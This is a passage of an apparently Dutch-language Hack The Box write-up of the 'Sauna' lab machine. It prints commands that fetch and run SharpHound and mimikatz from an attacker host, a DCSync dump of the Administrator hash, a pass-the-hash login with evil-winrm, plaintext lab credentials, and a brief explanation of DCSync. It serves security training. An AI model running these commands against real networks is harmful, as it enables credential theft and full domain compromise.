iex(new-object net.webclient).downloadString('http://10.10.14.22/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Domain EGOTISTICAL-BANK.LOCAL -LDAPUser fsmith -LDAPPass Thestrokes23
Waarna ik het resultaat heb gedownload naar mijn eigen machine met behulp van de volgende commando:
download 20200630151351_BloodHound.zip /root/Documents/htb/sauna/bloodhound.zip
Vervolgens heb ik dit bestand geopend in bloodhound, voordat je bloodhound kan runnen moet je eerst de volgende commando uitvoeren:
neo4j console
Hierna kan je de commando ‘bloodhound’ runnen en word het programma gestart waarna je de zip bestand naar bloodhound kan slepen. Daarna kan je linkboven naar queries gaan om vervolgens te klikken op “Find Principals with DCSync Rights”.

Zo te zien kunnen wij met het nieuwe account dat wij gevonden hebben dankzij WinPeas een DCSync aanval uitvoeren.
De volgende stap was om met deze nieuwe informatie opnieuw in te loggen met behulp van evil-winrm.

De volgende stap is om mimikatz.exe naar onze doelwit overzetten om dit programma vervolgens te kunnen gebruiken. Dit heb ik gedaan met behulp van de volgende commando:
certutil -urlcache -split -f "http://IP/mimikatz.exe" mimikatz.exe
vervolgens heb ik de volgende commando uitgevoerd:
.\mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"
Waarna we het volgende resultaat zien

Met behulp van deze informatie kunnen wij nu inloggen als administrator met behulp van de volgende commando:
evil-winrm -u administrator -H "d9485863c1e9e05851aa40cbb4ab9dff" -i 10.10.10.175
Dat was de machine, bedankt voor het lezen!
DSYnc aanval?
DCSync is een commando in mimikatz dat een aanvaller kan gebruiken om het gedrag van een domein controller na te doen. Simpel gezegd het stelt de aanvaller in staat om zich voor te doen als een domein controller om vervolgens aan andere domein controllers wachtwoord data op te vragen.
Hoe werkt dit?
- Een aanvaller neemt een account over met de rechten om een domein replicatie te kunne uitvoeren.
- Zodra de aanvaller de benodigde rechten heeft kan de aanvaller met behulp van mimikatz de dsync commando uitvoeren om vervolgens wachtwoord data op te kunnen vragen.
- Zodra de aanvaller de wachtwoord data heeft opgevraagd kan hij deze gebruiken om een nagemaakte kerberos ticket te maken. Hierme kan de aanvaller toegang krijgen tot alle bronnen die verbonden zijn met de active directory.